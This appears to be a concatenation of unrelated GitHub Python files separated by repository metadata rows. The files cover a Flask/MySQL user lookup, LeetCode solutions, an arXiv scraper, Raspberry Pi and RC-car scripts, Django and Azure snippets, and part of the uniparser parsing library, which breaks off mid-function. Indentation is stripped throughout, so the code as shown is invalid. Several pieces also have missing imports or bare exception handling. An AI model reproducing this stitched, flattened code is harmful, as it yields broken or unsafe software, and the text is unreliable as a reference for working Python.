cur = mysql.connection.cursor()
#cur.execute("INSERT INTO users(name) VALUES (%s)", [firstName])
#mysql.connection.commit()
cur.execute("SELECT COUNT(*) from users where name= (%s)",[firstName] )
result=cur.fetchone()
cur.close()
if str(result) == '(0,)':
return 'unknown user : ' + firstName
return 'Welcome : ' + firstName + ' ' + str(result)
return render_template('index.html')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
| julienmiquelilab/ilab | app-IN-cloud-TP1.py | app-IN-cloud-TP1.py | py | 1,222 | python | en | code | 0 | github-code | 13 |
19905007427 | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x, left=None, right=None):
self.val = x
self.left = left
self.right = right
class Solution(object):
def isSubtree(self, s, t):
"""
:type s: TreeNode
:type t: TreeNode
:rtype: bool
"""
#easy #为了区分[12] [2]
def convert(p):
return "#" + str(p.val) + convert(p.left) + convert(p.right) if p else "$"
return convert(t) in convert(s)
#mine 首先dfs遍历,找到所有与t root相等的点,然后递归比较左右结点
stack = []
res = []
stack.append(s)
node = None
x = 0
while stack:
node = stack.pop()
if node:
if node.val == t.val:
res.append(node)
stack.append(node.left)
stack.append(node.right)
for i in range(len(res)):
print(res[i].val)
if res:
for i in range(len(res)):
x = x or self.compare_val(res[i],t)
return bool(x)
else:
return False
def compare_val(self, s, t):
if not s and not t:
return True
if s and t and s.val == t.val:
return True and self.compare_val(s.left,t.left) and self.compare_val(s.right,t.right)
return False
s = Solution()
a = s.isSubtree(TreeNode(1,TreeNode(1)),TreeNode(1))
print(a)
| littleliona/leetcode | easy/572.subtree_of_another_tree.py | 572.subtree_of_another_tree.py | py | 1,527 | python | en | code | 0 | github-code | 13 |
41379836944 | # import libraries
from urllib.request import urlopen
import csv
from bs4 import BeautifulSoup
quote_page = "https://arxiv.org/search/advanced?advanced=&terms-0-operator=AND&terms-0-term=Machine+Learning&terms-0-field=title&classification-computer_science=y&classification-economics=y&classification-eess=y&classification-mathematics=y&classification-physics=y&classification-physics_archives=all&classification-q_biology=y&classification-q_finance=y&classification-statistics=y&classification-include_cross_list=include&date-year=&date-filter_by=date_range&date-from_date=2009&date-to_date=2019&date-date_type=announced_date_first&abstracts=show&size=200&order=announced_date_first&start=3200"
page = urlopen(quote_page).read()
soup = BeautifulSoup(page, 'html.parser')
papersAll = soup.find("h1", attrs={"class": "title is-clearfix"}).text
total_papers = papersAll.strip().split(" ")[3]
individualTitles = []
for line in soup.find_all("p", attrs={"class": "title is-5 mathjax"}):
line = line.text
line = line.strip()
line = line.replace("\n", "")
line = line.replace(",", "")
individualTitles.append(line)
individualAnnounceDate = []
for line in soup.find_all("p", attrs={"class": "is-size-7"}):
line = line.text
line = line.strip()
line = line.replace("\n", "")
line = line.replace(",", "")
line = line.split("originally announced")
if (len(line) == 2):
individualAnnounceDate.append(line[1][1:-1])
individualAuthors = []
for line in soup.find_all("p", attrs={"class": "authors"}):
line = line.text
line = line.replace("\n", "")[8:]
# line = line.replace(",", "")
line = ' '.join(line.split())
# line = line.split(",")
print(line)
individualAuthors.append(line)
for i in range(len(individualAnnounceDate)):
with open("index.csv", "a") as csv_file:
writer = csv.writer(csv_file)
writer.writerow([individualTitles[i][0], individualAnnounceDate[i], individualAuthors[i]])
| amysen/BR_Algothon | cornell_scraper.py | cornell_scraper.py | py | 1,918 | python | en | code | 1 | github-code | 13 |
6768252735 | import pandas as pd
import matplotlib.pyplot as plt
def show_overview(data):
#DataFrame shape.
print('Shape of DataFrame is: {}\n'.format(str(data.shape)))
#First 10 rows.
print('First 10 rows look like this:')
print(data.head(10))
#Stats.
print('\nDataframe stats are:')
print(data.describe())
"""
Create boxplot of all, or selected columns.
"""
def boxplot(data, columns=[]):
if columns == []:
data.plot.box()
else:
data[columns].plot.box()
plt.show()
"""
Create lineplot of target through time.
"""
def target_lineplot(data):
data['Target'].plot()
plt.show()
"""
Invoke all eda
"""
def eda(data, columns=[]):
show_overview(data)
boxplot(data, columns)
target_lineplot(data)
| asicoderOfficial/mas_stock_prediction | src/eda.py | eda.py | py | 767 | python | en | code | 2 | github-code | 13 |
3481263724 | import RPi.GPIO as GPIO
import time as time
import sys
timestamp = 0
count = 0
r = []
#time.sleep(90) # REMOVE AFTER GOING BACK INSIDE
print(sys.argv)
if len(sys.argv) > 1:
interval = int(sys.argv[1]) # Seconds between each measurement
if len(sys.argv) > 2:
num_intervals = int(sys.argv[2]) # number of intervals measured
if len(sys.argv) > 3:
name = str(sys.argv[3])
GPIO.setmode(GPIO.BCM)
GPIO.setup(17, GPIO.IN)
def my_callback(channel):
global count
count += 1
print("fallen")
GPIO.add_event_detect(17, GPIO.FALLING, callback = my_callback)
myFile2 = open(name + "_" + str(round(time.time()))+".csv", "w")
myFile2.write("Counts," + " Timestamp" + "\n")
while timestamp <= num_intervals * interval:
timestamp += 1
if timestamp % interval == 0:
r.append([count, timestamp])
myFile2.write(str(count) + ", " + str(timestamp) + "\n")
count = 0
# timestamp = 0
print("looped")
print(count)
print(r)
time.sleep(1)
| srajadnya1/E11-Labwork | rad_sensor.py | rad_sensor.py | py | 996 | python | en | code | 0 | github-code | 13 |
12871052855 | """
Problem statement:
Design a system that manages the reseration state of n seats that are numbered from 1 to n.
Implement the SeatManager class:
* SeatManager(int n) Initialize a SeatManager object that will manage n seats numbered from 1 to n. All seats are initially available.
* int reserve() Fetches the smallest-numbered unreserved seat, reserves it, and returns it number.
* void unreserve(int seatNumber) Unreserves the seat with the given seatNumber.
Example 1:
Input
["SeatManager", "reserve", "reserve", "unreserve", "reserve", "reserve", "reserve", "reserve", "unreserve"]
[[5], [], [], [2], [], [], [], [], [5]]
Output
[null, 1, 2, null, 2, 3, 4, 5, null]
Explanation
SeatManager seatManager = new SeatManager(5); // Initializes a SeatManager with 5 seats.
seatManager.reserve(); // All seats are available, so return the lowest numbered seat, which is 1.
seatManager.reserve(); // The available seats are [2,3,4,5], so return the lowest of them, which is 2.
seatManager.unreserve(2); // Unreserve seat 2, so now the available seats are [2,3,4,5].
seatManager.reserve(); // The available seats are [2,3,4,5], so return the lowest of them, which is 2.
seatManager.reserve(); // The available seats are [3,4,5], so return the lowest of them, which is 3.
seatManager.reserve(); // The available seats are [4,5], so return the lowest of them, which is 4.
seatManager.reserve(); // The only available seat is seat 5, so return 5.
seatManager.unreserve(5); // Unreserve seat 5, so now the available seats are [5].
Constraints:
* 1 <= n <= 10^5
* 1 <= seatNumber <= n
* For each call to reserve, it is guaranteed that there will be at least one unreserved seat.
* For each call to unreserve, it is guaranteed that seatNumber will be reserved.
* At most 10^5 calls in total will be made to reserve and unreserve.
Hints:
* You need a data structure that maintains the states of the seats. This data structure should also allow you to get the first available seat and flip the state of a seat in a reasonable time.
* You can let the data structure contains the available seats. Then you want to be able to get the lowest element and erase an element, in a resonable time.
* Ordered sets support these operations.
NOTE: There is a better approach check this out here: https://leetcode.com/problems/seat-reservation-manager/editorial/?envType=daily-question&envId=2023-11-06
"""
class SeatManagerTLE:
def __init__(self, n: int):
"""
Use set to manipulate the empty seat
"""
self.available_seat = set(range(1, n+1))
self.occupied_seat = set() # type: set
def reserve(self) -> int:
"""
Get the lowest available seat
Set it to the occupied_seat
"""
available = min(self.available_seat) # Use some thing like min-heap instead of use the min method
self.available_seat.remove(available)
self.occupied_seat.add(available)
return available
def unreserve(self, seatNumber: int) -> None:
self.occupied_seat.discard(seatNumber)
self.available_seat.add(seatNumber)
from heapq import heapify, heappop, heappush
class SeatManager:
def __init__(self, n: int):
"""
Just use the minheap to maintain the mimimum available seat
"""
self.available_seat = list(range(1, n+1))
heapify(self.available_seat)
def reserve(self) -> int:
"""
Get the lowest available seat
Set it to the occupied_seat
"""
available = heappop(self.available_seat)
return available
def unreserve(self, seatNumber: int) -> None:
heappush(self.available_seat, seatNumber)
# Your SeatManager object will be instantiated and called as such:
# obj = SeatManager(n)
# param_1 = obj.reserve()
# obj.unreserve(seatNumber)
if __name__ == '__main__':
obj = SeatManager(n=5)
print(obj.reserve())
print(obj.reserve())
obj.unreserve(seatNumber=2)
print(obj.reserve())
print(obj.reserve())
print(obj.reserve())
print(obj.reserve())
obj.unreserve(seatNumber=5)
pass | Nacriema/Leet-Code | daily_challenges/seat-reservation-manager.py | seat-reservation-manager.py | py | 4,632 | python | en | code | 0 | github-code | 13 |
35997219576 |
import utils
import backoff
from azure.mgmt.authorization import AuthorizationManagementClient
from azure.core.exceptions import ResourceNotFoundError
@backoff.on_exception(backoff.expo, HttpResponseError, max_time=300)
@utils.Decorator()
def assign_role_to_rg(cli_args, resource_group, msi_principal_id):
resource_client = AuthorizationManagementClient(cli_args.credential, cli_args.subscription_id, '2018-01-01-preview')
# Get "Contributor" built-in role as a RoleDefinition object
role_name = 'Contributor'
roles = list(resource_client.role_definitions.list(
resource_group.id,
filter="roleName eq '{}'".format(role_name)
))
assert len(roles) == 1
contributor_role = roles[0]
return resource_client.role_assignments.create(
resource_group.id,
uuid.uuid4(), # Role assignment random name
{
'role_definition_id': contributor_role.id,
'principal_id': msi_principal_id,
'principal_type': "ServicePrincipal",
}
)
@utils.Decorator()
def get(cli_args):
resource_client = ManagedServiceIdentityClient(cli_args.credential, cli_args.subscription_id)
return resource_client.user_assigned_identities.get(
cli_args.resource_group,
cli_args.msi_name,
)
@utils.Decorator()
def create(cli_args):
resource_client = ManagedServiceIdentityClient(cli_args.credential, cli_args.subscription_id)
return resource_client.user_assigned_identities.create_or_update(
cli_args.resource_group,
cli_args.msi_name,
{
"location": cli_args.region,
}
)
def get_or_create(args, nsg):
try:
msi = get(args)
except ResourceNotFoundError:
msi = create(args, nsg)
return msi
| crodriguezde/reimage | msi.py | msi.py | py | 1,797 | python | en | code | 0 | github-code | 13 |
3720816290 | '''
풀다가 엇나감
긴 코드를 함수로 자르는 연습 더 해야함
'''
from collections import deque
import sys
global INT_MAX
INT_MAX = sys.maxsize
n,m = map(int,input().split()) # m = 병원
grid =[
list(map(int,input().split()))
for _ in range(n)
]
# 빈칸인 경우 0, 사람인 경우 1, 병원인 경우 2
visited = [
[0 for _ in range(n)]
for _ in range(n)
]
result = [
[INT_MAX for _ in range(n)]
for _ in range(n)
]
dx, dy = [-1,1,0,0],[0,0,-1,1]
def visited_initialization():
for i in range(n):
for j in range(n):
visited[i][j] = 0
def result_initialization():
global INT_MAX
for i in range(n):
for j in range(n):
result[i][j] = INT_MAX
def in_range(x,y):
return 0 <= x < n and 0 <= y < n
def can_go(x, y, dist):
if not in_range(x,y):
return False
if visited[x][y] == 1 :
return False
if dist > result[x][y]:
return False
return True
def bfs():
while q:
x,y,dist = q.popleft() # 행, 열, 거리
dist += 1 # 길이 1 추가
for i in range(4):
new_x,new_y = x + dx[i], y + dy[i]
if can_go(new_x, new_y,dist):
visited[new_x][new_y] = 1
result[new_x][new_y] = dist # 거리 기록
q.append([new_x, new_y, dist])
def cal_dist(grid,result):
cnt = 0
for i in range(n):
for j in range(n):
if grid[i][j] == 1:
cnt += result[i][j]
return cnt
def choice_hospital(grid):
global min_val
hospital_info = []
hospitals = []
for i in range(n):
for j in range(m):
if grid[i][j] == 2:
hospital_info.append([i,j])
#print(hospital_info)
# print("?")
combination = []
def print_combination():
global min_val
#print(combination)
hospitals = []
temp = []
for c in combination:
temp.append(hospital_info[c-1])
#print(temp)
grid_copied = [0 for _ in range(n) for _ in range(n)]
for i in range(n):
grid_copied[i] = grid[i][:]
for x,y in temp:
grid_copied[x][y] = 3
#print(x,y)
for i in range(n):
for j in range(n):
if grid_copied[i][j] == 3: # 출발점
print('start',i,j)
visited[i][j] = 1
dist = 1
q.append([i, j, 0])
bfs()
for k in range(n):
for kk in range(n):
print(result[k][kk],end=' ')
print()
min_val = min(cal_dist(grid_copied, result), min_val)
visited_initialization()
result_initialization()
print(min_val)
#print(temp)
#print(hospital_info[c-1], end=' ')
#hospitals.append(temp)
#print(hospitals)
#return hospitals
# print()
def find_combination(curr_num, cnt):
if curr_num == len(hospital_info) + 1:
if cnt == m:
print_combination()
return
combination.append(curr_num)
find_combination(curr_num + 1, cnt + 1)
combination.pop()
find_combination(curr_num + 1, cnt)
find_combination(1, 0)
q = deque()
global min_val
min_val = INT_MAX
choice_hospital(grid)
| JaeEon-Ryu/Coding_test | LeeBrosCode/코테2.py | 코테2.py | py | 3,495 | python | en | code | 1 | github-code | 13 |
18719739725 | import io
import os
import socket
import struct
import cv2
import time
import numpy as np
import pygame
from PIL import Image
from pygameControl import CV2PYGAME, RCControl
server_socket = socket.socket()
#data collected from stream and pygame controls will be save to:
train_data = []
file_name = 'training_ether_final.npy'
if os.path.isfile(file_name):
print("file exists, opening file...")
train_data = list(np.load(file_name))
else: print("file does not exists, create new")
#pygame object to directly control the car
pygameControl = RCControl()
#The image contains a lot of redundant info. So we are going to filter through it
#and find what we really need
##def processImage(img):
## img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
## return img[140:,:]
def startListening():
server_socket.bind(('0.0.0.0', 6116))
server_socket.listen(0)
connection = server_socket.accept()[0].makefile('rb')
command_key = 6
startGatheringData = False # can be use as a pause
try:
count = 0
clock = pygame.time.Clock()
while(True):
#start = time.time()
image_len = struct.unpack('<L', connection.read(struct.calcsize('<L')))[0]
#if the client sends image len of 0, exit
if ((pygameControl.QUIT) | (not image_len) | (cv2.waitKey(5) & 0xFF == 'q') ):
#stop RC car and exit after 100 data points or the streaming stop
pygameControl.simpleControl(6)
pygameControl.quit()
cv2.destroyAllWindows()
break
#convert back into image
image_stream = io.BytesIO()
image_stream.write(connection.read(image_len))
image_stream.seek(0)
data = np.fromstring(image_stream.getvalue(), dtype = np.uint8)
image = cv2.imdecode(data,1)
#The original image is just too big to store, and i don't feel like the neuronet need such a large pixel image to detect features
gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
imageResized = cv2.resize(gray, (480,360))
pygameControl.setScreen(CV2PYGAME(cv2.flip(image, 1)))
#getKeys() return True if there are changes in the pressed arrow
if(pygameControl.getKeys()):
command_key = pygameControl.getCommand()
pygameControl.simpleControl(command_key) #.001s
#if there are charnges, signal start gathering data
#Pause the data collection process by pressing key 'p'
#start the data collection process by pressing key 's'
pressed = pygameControl.P()
if(pressed[0]):
print("pause gathering data")
startGatheringData = False
if(pressed[1]):
print("start gathering data")
startGatheringData = True
if(startGatheringData):
count+=1
train_data.append([imageResized, command_key])
if(count%200 == 0):
print("have collected {} data points".format(count))
clock.tick(60)
#end = time.time()
#print("time per loop:",end-start)
finally:
connection.close()
server_socket.close()
startListening()
np.save(file_name,train_data)
| herobaby71/Self-driving-RC-Car | LaptopServerDataCollection.py | LaptopServerDataCollection.py | py | 3,422 | python | en | code | 0 | github-code | 13 |
3464690631 | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, Http404, JsonResponse
from .models import Question, Test, Filters
from django.template import loader
from django.shortcuts import render
import json
def index(request):
latest_question_list = Question.objects.order_by('-pub_date')[:5]
context = {'latest_question_list': latest_question_list}
return render(request, 'polls/index.html', context)
def detail(request, question_id):
question = get_object_or_404(Question, pk=question_id)
return render(request, 'polls/detail.html', {'question': question})
def results(request, question_id):
response = "You're looking at the results of question %s."
return HttpResponse(response % question_id)
def vote(request, question_id):
return HttpResponse("You're voting on question %s." % question_id)
"""
Graphic type, 0,1,2,3, each refers to red, green, blue, red and green.
"""
def getTestGraphics(request, graphicType):
path = r""
with open(path, 'rb') as f:
img = f.read()
return HttpResponse(img, content_type='image/png')
"""
degrees: 测试程度,数组长度为3,其中idx为0 1 2 分别是 红 绿 蓝,根据当前测试程度赋值,
红色盲仅赋值degrees[0],以此类推
testType: 测试类型,0-红色盲,1-绿色盲,2-蓝色盲,3-红绿混合
userId: 用户ID
"""
def storeTestDegree(request):
userId = request.GET['userId']
testType = request.GET['testType']
degrees = request.GET['degrees']
print(type(degrees))
degrees = list(degrees.split(","))
print(type(degrees))
print(degrees)
# print(degrees, testType, userId)
# return HttpResponse("{} {} {}".format(degrees, testType, userId))
try:
temp = Test.objects.values().filter(userId=userId, testType=testType)
if temp:
temp.update(userId=userId, testType=testType,
degreeA=degrees[0], degreeB=degrees[1],
degreeC=degrees[2])
temp = temp[0]
print(temp)
print("Update OK")
else:
t = Test(userId=userId, testType=testType,
degreeA=degrees[0], degreeB=degrees[1],
degreeC=degrees[2])
print("Test created")
t.save()
print("Save OK")
except:
return HttpResponse("ERROR!")
return HttpResponse("YES")
# if request.method == 'POST':
# print("the POST method")
# concat = request.POST
# print(concat)
# # print(concat['username'])
#
# postBody = request.body
# print(type(postBody))
# print(postBody)
# print(degrees, testType, userId)
#
# return HttpResponse("YES!")
def storeTestFilter(t: Test):
id = t.userId
type = t.testType
f = Filters(userId=id, filterType=type)
def getDefaultParams(request):
# search for default params in database
# return these data in array
user_filter = [[2, 2], [3, 3]]
data = {"arr": user_filter}
return JsonResponse(data)
def getUserFilterParams(request):
# user_filter = get_object_or_404(Filters, pk=userId)
userId = request.GET["userId"]
print(userId)
try:
temp = Test.objects.values().filter(userId=userId)
print(temp)
if temp:
temp = list(temp)
print(temp)
data = {
"userFilterParams": temp,
"message": "OK"
}
else:
data = {
"userFilterParams": [],
"message": "Not Match"
}
print(data)
return JsonResponse(data)
except:
data = {
"userFilterParams": [],
"message": "ERROR"
}
return JsonResponse(data)
| nanfang-wuyu/Django | mysite/polls/views.py | views.py | py | 3,859 | python | en | code | 0 | github-code | 13 |
15892288690 | # -*- coding: utf-8 -*-
import asyncio
import re
from abc import ABC, abstractmethod
from base64 import (b16decode, b16encode, b32decode, b32encode, b64decode,
b64encode, b85decode, b85encode)
from copy import deepcopy
from hashlib import md5 as _md5
from itertools import chain
from logging import getLogger
from re import compile as re_compile
from string import Template
from time import localtime, mktime, strftime, strptime, timezone
from typing import Any, Callable, Dict, List, Union
from .config import GlobalConfig
from .exceptions import InvalidSchemaError, UnknownParserNameError
from .utils import (AsyncRequestAdapter, InputCallbacks, NullContext,
SyncRequestAdapter, _lib, check_import, decode_as_base64,
encode_as_base64, ensure_await_result, ensure_request,
get_available_async_request, get_available_sync_request,
get_host, to_thread)
__all__ = [
'BaseParser', 'ParseRule', 'CrawlerRule', 'HostRule', 'CSSParser',
'SelectolaxParser', 'XMLParser', 'RegexParser', 'JSONPathParser',
'ObjectPathParser', 'JMESPathParser', 'PythonParser', 'UDFParser',
'LoaderParser', 'Uniparser'
]
logger = getLogger('uniparser')
def return_self(self, *args, **kwargs):
return self
def md5(string, n=32, encoding="utf-8", skip_encode=False):
"""str(obj) -> md5_string
:param string: string to operate.
:param n: md5_str length.
>>> md5(1, 10)
'923820dcc5'
>>> md5('test')
'098f6bcd4621d373cade4e832627b4f6'
"""
todo = string if skip_encode else str(string).encode(encoding)
if n == 32:
return _md5(todo).hexdigest()
elif isinstance(n, (int, float)):
return _md5(todo).hexdigest()[(32 - n) // 2:(n - 32) // 2]
elif isinstance(n, (tuple, list)):
return _md5(todo).hexdigest()[n[0]:n[1]]
class BaseParser(ABC):
"""Sub class of BaseParser should have these features:
Since most input object always should be string, _RECURSION_LIST will be True.
1. class variable `name`
2. `_parse` method
3. use lazy import, maybe
4. Parsers will recursion parse list of input_object if it can only parse `str` object.
Test demo::
def _partial_test_parser():
from uniparser import Uniparser
uni = Uniparser()
args = [
['adcb', 'sort', ''],
]
max_len = max([len(str(i)) for i in args])
for i in args:
print(f'{str(i):<{max_len}} => {uni.python.parse(*i)}')
"""
test_url = 'https://github.com/ClericPy/uniparser'
doc_url = 'https://github.com/ClericPy/uniparser'
name = 'base'
installed = True
_RECURSION_LIST = True
__slots__ = ()
@abstractmethod
def _parse(self, input_object, param, value):
pass
def parse(self, input_object, param, value):
try:
if isinstance(input_object, list) and self._RECURSION_LIST:
return [
self._parse(item, param, value) for item in input_object
]
else:
return self._parse(input_object, param, value)
except GlobalConfig.SYSTEM_ERRORS:
raise
except Exception as err:
# traceback.format_exception(None, e, e.__traceback__)
return err
@property
def doc(self):
# If need dynamic doc, overwrite this method.
return f'{self.__class__.__doc__}\n\n{self.doc_url}\n\n{self.test_url}'
def __call__(self, *args, **kwargs):
return self.parse(*args, **kwargs)
class CSSParser(BaseParser):
"""CSS selector parser, requires `bs4` and `lxml`(optional).
Since HTML input object always should be string, _RECURSION_LIST will be True.
Parse the input object with standard css selector, features from `BeautifulSoup`.
:param input_object: input object, could be Tag or str.
:type input_object: [Tag, str]
:param param: css selector path
:type param: [str]
:param value: operation for each item of result
:type value: [str]
@attribute: return element.get(xxx)
$text: return element.text
$innerHTML, $html: return element.decode_contents()
$outerHTML, $string: return str(element)
$self: return element
:return: list of Tag / str
:rtype: List[Union[str, Tag]]
examples:
['<a class="url" href="/">title</a>', 'a.url', '@href'] => ['/']
['<a class="url" href="/">title</a>', 'a.url', '$text'] => ['title']
['<a class="url" href="/">title</a>', 'a.url', '$innerHTML'] => ['title']
['<a class="url" href="/">title</a>', 'a.url', '$html'] => ['title']
['<a class="url" href="/">title</a>', 'a.url', '$outerHTML'] => ['<a class="url" href="/">title</a>']
['<a class="url" href="/">title</a>', 'a.url', '$string'] => ['<a class="url" href="/">title</a>']
['<a class="url" href="/">title</a>', 'a.url', '$self'] => [<a class="url" href="/">title</a>]
WARNING: $self returns the original Tag object
"""
name = 'css'
doc_url = 'https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Selectors'
installed = check_import('bs4')
operations = {
'@attr': lambda element: element.get(),
'$text': lambda element: element.text,
'$innerHTML': lambda element: element.decode_contents(),
'$html': lambda element: element.decode_contents(),
'$outerHTML': lambda element: str(element),
'$string': lambda element: str(element),
'$self': return_self,
}
@property
def doc(self):
return f'{self.__class__.__doc__}\n\nvalid value args: {list(self.operations.keys())}\n\n{self.doc_url}\n\n{self.test_url}'
def _parse(self, input_object, param, value):
result = []
if not input_object:
return result
# ensure input_object is instance of BeautifulSoup
if not isinstance(input_object, _lib.Tag):
if check_import('lxml'):
input_object = _lib.BeautifulSoup(input_object, 'lxml')
else:
input_object = _lib.BeautifulSoup(input_object, 'html.parser')
if value.startswith('@'):
result = [
item.get(value[1:], None) for item in input_object.select(param)
]
else:
operate = self.operations.get(value, return_self)
result = [operate(item) for item in input_object.select(param)]
return result
class CSSSingleParser(CSSParser):
"""Similar to CSSParser but use select_one instead of select method.
examples:
['<a class="url" href="/">title</a>', 'a.url1', '@href'] => None
['<a class="url" href="/">title</a>', 'a.url', '@href'] => '/'
['<a class="url" href="/">title</a>', 'a.url', '$text'] => 'title'
['<a class="url" href="/">title</a>', 'a.url', '$innerHTML'] => 'title'
['<a class="url" href="/">title</a>', 'a.url', '$html'] => 'title'
['<a class="url" href="/">title</a>', 'a.url', '$outerHTML'] => '<a class="url" href="/">title</a>'
['<a class="url" href="/">title</a>', 'a.url', '$string'] => '<a class="url" href="/">title</a>'
['<a class="url" href="/">title</a>', 'a.url', '$self'] => <a class="url" href="/">title</a>
"""
name = 'css1'
def _parse(self, input_object, param, value):
result = []
if not input_object:
return result
# ensure input_object is instance of BeautifulSoup
if not isinstance(input_object, _lib.Tag):
if check_import('lxml'):
input_object = _lib.BeautifulSoup(input_object, 'lxml')
else:
input_object = _lib.BeautifulSoup(input_object, 'html.parser')
item = input_object.select_one(param)
if item is None:
return None
if value.startswith('@'):
return item.get(value[1:], None)
operate = self.operations.get(value, return_self)
return operate(item)
class SelectolaxParser(BaseParser):
"""CSS selector parser based on `selectolax`, faster than lxml.
Since HTML input object always should be string, _RECURSION_LIST will be True.
Parse the input object with standard css selector.
:param input_object: input object, could be Node or str.
:type input_object: [Node, str]
:param param: css selector path
:type param: [str]
:param value: operation for each item of result
:type value: [str]
@attribute: return element.attributes.get(xxx)
$text: return element.text
$outerHTML, $html: return element.html
$self: return element
:return: list of Node / str
:rtype: List[Union[str, Node]]
examples:
['<a class="url" href="/">title</a>', 'a.url', '@href'] => ['/']
['<a class="url" href="/">title</a>', 'a.url', '$text'] => ['title']
['<a class="url" href="/">title</a>', 'a.url', '$string'] => ['<a class="url" href="/">title</a>']
['<a class="url" href="/">title</a>', 'a.url', '$outerHTML'] => ['<a class="url" href="/">title</a>']
['<a class="url" href="/">title</a>', 'a.url', '$self'] => [<a class="url" href="/">title</a>]
['<div>a <b>b</b> c</div>', 'div', '$html'] => ['a <b>b</b> c']
['<div>a <b>b</b> c</div>', 'div', '$innerHTML'] => ['a <b>b</b> c']
WARNING: $self returns the original Node object
"""
name = 'selectolax'
doc_url = 'https://github.com/rushter/selectolax'
installed = check_import('selectolax')
def get_inner_html(element):
result = []
element = element.child
while element:
result.append(element.html)
element = element.next
return ''.join(result)
operations = {
'@attr': lambda element: element.attributes.get(...),
'$text': lambda element: element.text(),
'$html': get_inner_html,
'$innerHTML': get_inner_html,
'$string': lambda element: element.html,
'$outerHTML': lambda element: element.html,
'$self': return_self,
}
@property
def doc(self):
return f'{self.__class__.__doc__}\n\nvalid value args: {list(self.operations.keys())}\n\n{self.doc_url}\n\n{self.test_url}'
def _parse(self, input_object, param, value):
result = []
if not input_object:
return result
# ensure input_object is instance of Node
if not isinstance(input_object, (_lib.Node, _lib.HTMLParser)):
input_object = _lib.HTMLParser(input_object)
if value.startswith('@'):
result = [
item.attributes.get(value[1:], None)
for item in input_object.css(param)
]
else:
operate = self.operations.get(value, return_self)
result = [operate(item) for item in input_object.css(param)]
return result
class SelectolaxSingleParser(SelectolaxParser):
"""Similar to SelectolaxParser but use css_first instead of select method.
examples:
['<a class="url" href="/">title</a>', 'a.url1', '@href'] => None
['<a class="url" href="/">title</a>', 'a.url', '@href'] => '/'
['<a class="url" href="/">title</a>', 'a.url', '$text'] => 'title'
['<a class="url" href="/">title</a>', 'a.url', '$innerHTML'] => 'title'
['<a class="url" href="/">title</a>', 'a.url', '$html'] => 'title'
['<a class="url" href="/">title</a>', 'a.url', '$outerHTML'] => '<a class="url" href="/">title</a>'
['<a class="url" href="/">title</a>', 'a.url', '$string'] => '<a class="url" href="/">title</a>'
['<a class="url" href="/">title</a>', 'a.url', '$self'] => <a class="url" href="/">title</a>
"""
name = 'se1'
def _parse(self, input_object, param, value):
result = []
if not input_object:
return result
# ensure input_object is instance of Node
if not isinstance(input_object, (_lib.Node, _lib.HTMLParser)):
input_object = _lib.HTMLParser(input_object)
item = input_object.css_first(param)
if item is None:
return ''
if value.startswith('@'):
return item.attributes.get(value[1:], None)
operate = self.operations.get(value, return_self)
return operate(item)
class XMLParser(BaseParser):
"""XML parser, requires `bs4` and `lxml`(necessary), but not support `xpath` for now.
Since XML input object always should be string, _RECURSION_LIST will be True.
Parse the input object with css selector, `BeautifulSoup` with features='xml'.
:param input_object: input object, could be Tag or str.
:type input_object: [Tag, str]
:param param: css selector path
:type param: [str]
:param value: operation for each item of result
:type value: [str]
@attribute: return element.get(xxx)
$text: return element.text
$innerXML: return element.decode_contents()
$outerXML: return str(element)
$self: return element
:return: list of Tag / str
:rtype: List[Union[str, Tag]]
examples:
['<dc:creator><![CDATA[author]]></dc:creator>', 'creator', '$text'] => ['author']
WARNING: $self returns the original Tag object
"""
name = 'xml'
doc_url = 'https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Selectors'
installed = check_import('lxml') and check_import('bs4')
operations = {
'@attr': lambda element: element.get(),
'$text': lambda element: element.text,
'$innerXML': lambda element: element.decode_contents(),
'$outerXML': lambda element: str(element),
'$self': return_self,
}
@property
def doc(self):
return f'{self.__class__.__doc__}\n\nvalid value args: {list(self.operations.keys())}\n\n{self.doc_url}\n\n{self.test_url}'
def _parse(self, input_object, param, value):
result = []
if not input_object:
return result
# ensure input_object is instance of BeautifulSoup
if not isinstance(input_object, _lib.Tag):
input_object = _lib.BeautifulSoup(input_object, 'lxml-xml')
if value.startswith('@'):
result = [
item.get(value[1:], None) for item in input_object.select(param)
]
else:
operate = self.operations.get(value, return_self)
result = [operate(item) for item in input_object.select(param)]
return result
class RegexParser(BaseParser):
"""RegexParser. Parse the input object with standard regex, features from `re`.
Since regex input object always should be string, _RECURSION_LIST will be True.
:param input_object: input object, could be str.
:type input_object: [str]
:param param: standard regex
:type param: [str]
:param value: operation for each item of result
:type value: [str]
@some string: using re.sub
$0: re.finditer and return list of the whole matched string
$1: re.finditer, $1 means return list of group 1
'': null str, means using re.findall method
-: return re.split(param, input_object)
#: return re.search(param, input_object).group(int(value[1:])), return '' if not matched.
:return: list of str
:rtype: List[Union[str]]
examples:
['a a b b c c', 'a|c', '@b'] => 'b b b b b b'
['a a b b c c', 'a', ''] => ['a', 'a']
['a a b b c c', 'a (a b)', '$0'] => ['a a b']
['a a b b c c', 'a (a b)', '$1'] => ['a b']
['a a b b c c', 'b', '-'] => ['a a ', ' ', ' c c']
['abcd', '(b.)d', '#0'] => 'bcd'
['abcd', '(b.)', '#1'] => 'bc'
['abcd', '(b.)', '#2'] => ''
['abcd', '.(?:d)', '#0'] => 'cd'
['abcd', '.(?:d)', '#1'] => ''
['abcd', '.(?<=c).', '#0'] => 'cd'
['abcd', '.(?<=c).', '#1'] => ''
"""
name = 're'
test_url = 'https://regex101.com/'
doc_url = 'https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expression-language-quick-reference'
VALID_VALUE_PATTERN = re_compile(r'^@|^\$\d+|^-$|^#\d+')
def _parse(self, input_object, param, value):
msg = f'input_object type should be str, but given {repr(input_object)[:30]}'
assert isinstance(input_object, str), ValueError(msg)
assert self.VALID_VALUE_PATTERN.match(value) or not value, ValueError(
r'args1 should match ^@|^\$\d+|^-$|^#\d+')
com = re_compile(param)
if not value:
return com.findall(input_object)
prefix, arg = value[0], value[1:]
if prefix == '@':
return com.sub(arg, input_object)
elif prefix == '$':
result = com.finditer(input_object)
return [match.group(int(arg)) for match in result]
elif prefix == '-':
return com.split(input_object)
elif prefix == '#':
matched = com.search(input_object)
if not matched:
return ''
try:
if arg.isdigit():
